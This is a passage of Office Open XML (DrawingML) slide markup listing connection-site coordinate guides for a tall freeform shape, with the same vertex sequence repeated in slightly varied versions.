              <a:gd name="connsiteX56" fmla="*/ 453239 w 1342244"/>
              <a:gd name="connsiteY56" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 454972 w 1342244"/>
              <a:gd name="connsiteY57" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 458715 w 1342244"/>
              <a:gd name="connsiteY58" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 466877 w 1342244"/>
              <a:gd name="connsiteY59" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 474223 w 1342244"/>
              <a:gd name="connsiteY60" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 473519 w 1342244"/>
              <a:gd name="connsiteY61" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 476962 w 1342244"/>
              <a:gd name="connsiteY62" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 484500 w 1342244"/>
              <a:gd name="connsiteY63" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 498392 w 1342244"/>
              <a:gd name="connsiteY64" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 504159 w 1342244"/>
              <a:gd name="connsiteY65" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 480918 w 1342244"/>
              <a:gd name="connsiteY66" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 456326 w 1342244"/>
              <a:gd name="connsiteY67" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 441801 w 1342244"/>
              <a:gd name="connsiteY68" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 416975 w 1342244"/>
              <a:gd name="connsiteY69" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 374255 w 1342244"/>
              <a:gd name="connsiteY70" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 308507 w 1342244"/>
              <a:gd name="connsiteY71" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 279324 w 1342244"/>
              <a:gd name="connsiteY72" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 266285 w 1342244"/>
              <a:gd name="connsiteY73" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 272284 w 1342244"/>
              <a:gd name="connsiteY74" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 274896 w 1342244"/>
              <a:gd name="connsiteY75" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 251225 w 1342244"/>
              <a:gd name="connsiteY76" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 241112 w 1342244"/>
              <a:gd name="connsiteY77" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 225329 w 1342244"/>
              <a:gd name="connsiteY78" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 222787 w 1342244"/>
              <a:gd name="connsiteY79" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 223780 w 1342244"/>
              <a:gd name="connsiteY80" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 196764 w 1342244"/>
              <a:gd name="connsiteY81" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 173321 w 1342244"/>
              <a:gd name="connsiteY82" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 127120 w 1342244"/>
              <a:gd name="connsiteY83" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 99431 w 1342244"/>
              <a:gd name="connsiteY84" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 98557 w 1342244"/>
              <a:gd name="connsiteY85" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 79352 w 1342244"/>
              <a:gd name="connsiteY86" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 85174 w 1342244"/>
              <a:gd name="connsiteY87" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 71259 w 1342244"/>
              <a:gd name="connsiteY88" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 79566 w 1342244"/>
              <a:gd name="connsiteY89" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 85439 w 1342244"/>
              <a:gd name="connsiteY90" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 77721 w 1342244"/>
              <a:gd name="connsiteY91" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 67027 w 1342244"/>
              <a:gd name="connsiteY92" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 55763 w 1342244"/>
              <a:gd name="connsiteY93" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 57219 w 1342244"/>
              <a:gd name="connsiteY94" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 52084 w 1342244"/>
              <a:gd name="connsiteY95" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 21492 w 1342244"/>
              <a:gd name="connsiteY96" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 442 w 1342244"/>
              <a:gd name="connsiteY97" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 0 w 1342244"/>
              <a:gd name="connsiteY98" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 9132 w 1342244"/>
              <a:gd name="connsiteY99" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 2788 w 1342244"/>
              <a:gd name="connsiteY100" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 84 w 1342244"/>
              <a:gd name="connsiteY101" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 3992 w 1342244"/>
              <a:gd name="connsiteY102" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 30116 w 1342244"/>
              <a:gd name="connsiteY103" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 29364 w 1342244"/>
              <a:gd name="connsiteY104" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 29194 w 1342244"/>
              <a:gd name="connsiteY105" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 34887 w 1342244"/>
              <a:gd name="connsiteY106" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 51914 w 1342244"/>
              <a:gd name="connsiteY107" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 43624 w 1342244"/>
              <a:gd name="connsiteY108" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 55908 w 1342244"/>
              <a:gd name="connsiteY109" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY110" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78938 w 1342244"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115531 w 1342244"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 127031 w 1342244"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 151770 w 1342244"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 143794 w 1342244"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 161862 w 1342244"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 228859 w 1342244"/>
              <a:gd name="connsiteY9" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 244546 w 1342244"/>
              <a:gd name="connsiteY10" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 271474 w 1342244"/>
              <a:gd name="connsiteY11" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 263386 w 1342244"/>
              <a:gd name="connsiteY12" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 265826 w 1342244"/>
              <a:gd name="connsiteY13" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 243818 w 1342244"/>
              <a:gd name="connsiteY14" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 242616 w 1342244"/>
              <a:gd name="connsiteY15" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 258031 w 1342244"/>
              <a:gd name="connsiteY16" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 245418 w 1342244"/>
              <a:gd name="connsiteY17" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 230647 w 1342244"/>
              <a:gd name="connsiteY18" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 280159 w 1342244"/>
              <a:gd name="connsiteY19" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 309957 w 1342244"/>
              <a:gd name="connsiteY20" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 319080 w 1342244"/>
              <a:gd name="connsiteY21" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 345956 w 1342244"/>
              <a:gd name="connsiteY22" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 359524 w 1342244"/>
              <a:gd name="connsiteY23" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 375505 w 1342244"/>
              <a:gd name="connsiteY24" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 408998 w 1342244"/>
              <a:gd name="connsiteY25" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 418597 w 1342244"/>
              <a:gd name="connsiteY26" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 429823 w 1342244"/>
              <a:gd name="connsiteY27" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 430843 w 1342244"/>
              <a:gd name="connsiteY28" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 438184 w 1342244"/>
              <a:gd name="connsiteY29" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 441487 w 1342244"/>
              <a:gd name="connsiteY30" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 442471 w 1342244"/>
              <a:gd name="connsiteY31" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 438105 w 1342244"/>
              <a:gd name="connsiteY32" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 444782 w 1342244"/>
              <a:gd name="connsiteY33" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 441715 w 1342244"/>
              <a:gd name="connsiteY34" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 448545 w 1342244"/>
              <a:gd name="connsiteY35" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 455581 w 1342244"/>
              <a:gd name="connsiteY36" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 458312 w 1342244"/>
              <a:gd name="connsiteY37" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 455016 w 1342244"/>
              <a:gd name="connsiteY38" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 456570 w 1342244"/>
              <a:gd name="connsiteY39" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 463479 w 1342244"/>
              <a:gd name="connsiteY40" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 459335 w 1342244"/>
              <a:gd name="connsiteY41" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 474738 w 1342244"/>
              <a:gd name="connsiteY42" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 480641 w 1342244"/>
              <a:gd name="connsiteY43" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 486667 w 1342244"/>
              <a:gd name="connsiteY44" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 484474 w 1342244"/>
              <a:gd name="connsiteY45" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 479954 w 1342244"/>
              <a:gd name="connsiteY46" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 475037 w 1342244"/>
              <a:gd name="connsiteY47" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 471602 w 1342244"/>
              <a:gd name="connsiteY48" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 452255 w 1342244"/>
              <a:gd name="connsiteY49" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 453884 w 1342244"/>
              <a:gd name="connsiteY50" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 441584 w 1342244"/>
              <a:gd name="connsiteY51" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 441309 w 1342244"/>
              <a:gd name="connsiteY52" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 427604 w 1342244"/>
              <a:gd name="connsiteY53" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 433387 w 1342244"/>
              <a:gd name="connsiteY54" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 455981 w 1342244"/>
              <a:gd name="connsiteY55" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 453239 w 1342244"/>
              <a:gd name="connsiteY56" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 454972 w 1342244"/>
              <a:gd name="connsiteY57" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 458715 w 1342244"/>
              <a:gd name="connsiteY58" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 466877 w 1342244"/>
              <a:gd name="connsiteY59" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 474223 w 1342244"/>
              <a:gd name="connsiteY60" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 473519 w 1342244"/>
              <a:gd name="connsiteY61" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 476962 w 1342244"/>
              <a:gd name="connsiteY62" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 484500 w 1342244"/>
              <a:gd name="connsiteY63" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 498392 w 1342244"/>
              <a:gd name="connsiteY64" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 504159 w 1342244"/>
              <a:gd name="connsiteY65" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 480918 w 1342244"/>
              <a:gd name="connsiteY66" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 456326 w 1342244"/>
              <a:gd name="connsiteY67" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 441801 w 1342244"/>
              <a:gd name="connsiteY68" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 416975 w 1342244"/>
              <a:gd name="connsiteY69" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 374255 w 1342244"/>
              <a:gd name="connsiteY70" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 308507 w 1342244"/>
              <a:gd name="connsiteY71" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 279324 w 1342244"/>
              <a:gd name="connsiteY72" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 266285 w 1342244"/>
              <a:gd name="connsiteY73" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 272284 w 1342244"/>
              <a:gd name="connsiteY74" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 274896 w 1342244"/>
              <a:gd name="connsiteY75" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 251225 w 1342244"/>
              <a:gd name="connsiteY76" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 241112 w 1342244"/>
              <a:gd name="connsiteY77" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 225329 w 1342244"/>
              <a:gd name="connsiteY78" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 222787 w 1342244"/>
              <a:gd name="connsiteY79" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 223780 w 1342244"/>
              <a:gd name="connsiteY80" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 196764 w 1342244"/>
              <a:gd name="connsiteY81" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 173321 w 1342244"/>
              <a:gd name="connsiteY82" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 127120 w 1342244"/>
              <a:gd name="connsiteY83" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 99431 w 1342244"/>
              <a:gd name="connsiteY84" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 98557 w 1342244"/>
              <a:gd name="connsiteY85" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 79352 w 1342244"/>
              <a:gd name="connsiteY86" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 85174 w 1342244"/>
              <a:gd name="connsiteY87" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 71259 w 1342244"/>
              <a:gd name="connsiteY88" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 79566 w 1342244"/>
              <a:gd name="connsiteY89" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 85439 w 1342244"/>
              <a:gd name="connsiteY90" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 77721 w 1342244"/>
              <a:gd name="connsiteY91" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 67027 w 1342244"/>
              <a:gd name="connsiteY92" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 55763 w 1342244"/>
              <a:gd name="connsiteY93" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 57219 w 1342244"/>
              <a:gd name="connsiteY94" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 52084 w 1342244"/>
              <a:gd name="connsiteY95" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 21492 w 1342244"/>
              <a:gd name="connsiteY96" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 442 w 1342244"/>
              <a:gd name="connsiteY97" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 0 w 1342244"/>
              <a:gd name="connsiteY98" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 9132 w 1342244"/>
              <a:gd name="connsiteY99" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 2788 w 1342244"/>
              <a:gd name="connsiteY100" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 84 w 1342244"/>
              <a:gd name="connsiteY101" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 3992 w 1342244"/>
              <a:gd name="connsiteY102" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 30116 w 1342244"/>
              <a:gd name="connsiteY103" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 29364 w 1342244"/>
              <a:gd name="connsiteY104" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 29194 w 1342244"/>
              <a:gd name="connsiteY105" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 34887 w 1342244"/>
              <a:gd name="connsiteY106" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 51914 w 1342244"/>
              <a:gd name="connsiteY107" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 43624 w 1342244"/>
              <a:gd name="connsiteY108" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 33909 w 1342244"/>
              <a:gd name="connsiteY109" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY110" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78938 w 1342244"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115531 w 1342244"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 127031 w 1342244"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 151770 w 1342244"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 143794 w 1342244"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 161862 w 1342244"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 228859 w 1342244"/>
              <a:gd name="connsiteY9" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 244546 w 1342244"/>
              <a:gd name="connsiteY10" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 271474 w 1342244"/>
              <a:gd name="connsiteY11" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 263386 w 1342244"/>
              <a:gd name="connsiteY12" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 265826 w 1342244"/>
              <a:gd name="connsiteY13" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 243818 w 1342244"/>
              <a:gd name="connsiteY14" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 242616 w 1342244"/>
              <a:gd name="connsiteY15" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 258031 w 1342244"/>
              <a:gd name="connsiteY16" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 245418 w 1342244"/>
              <a:gd name="connsiteY17" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 230647 w 1342244"/>
              <a:gd name="connsiteY18" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 280159 w 1342244"/>
              <a:gd name="connsiteY19" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 309957 w 1342244"/>
              <a:gd name="connsiteY20" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 319080 w 1342244"/>
              <a:gd name="connsiteY21" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 345956 w 1342244"/>
              <a:gd name="connsiteY22" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 359524 w 1342244"/>
              <a:gd name="connsiteY23" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 375505 w 1342244"/>
              <a:gd name="connsiteY24" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 408998 w 1342244"/>
              <a:gd name="connsiteY25" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 418597 w 1342244"/>
              <a:gd name="connsiteY26" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 429823 w 1342244"/>
              <a:gd name="connsiteY27" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 430843 w 1342244"/>
              <a:gd name="connsiteY28" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 438184 w 1342244"/>
              <a:gd name="connsiteY29" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 441487 w 1342244"/>
              <a:gd name="connsiteY30" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 442471 w 1342244"/>
              <a:gd name="connsiteY31" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 438105 w 1342244"/>
              <a:gd name="connsiteY32" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 444782 w 1342244"/>
              <a:gd name="connsiteY33" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 441715 w 1342244"/>
              <a:gd name="connsiteY34" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 448545 w 1342244"/>
              <a:gd name="connsiteY35" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 455581 w 1342244"/>
              <a:gd name="connsiteY36" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 458312 w 1342244"/>
              <a:gd name="connsiteY37" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 455016 w 1342244"/>
              <a:gd name="connsiteY38" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 456570 w 1342244"/>
              <a:gd name="connsiteY39" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 463479 w 1342244"/>
              <a:gd name="connsiteY40" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 459335 w 1342244"/>
              <a:gd name="connsiteY41" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 474738 w 1342244"/>
              <a:gd name="connsiteY42" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 480641 w 1342244"/>
              <a:gd name="connsiteY43" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 486667 w 1342244"/>
              <a:gd name="connsiteY44" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 484474 w 1342244"/>
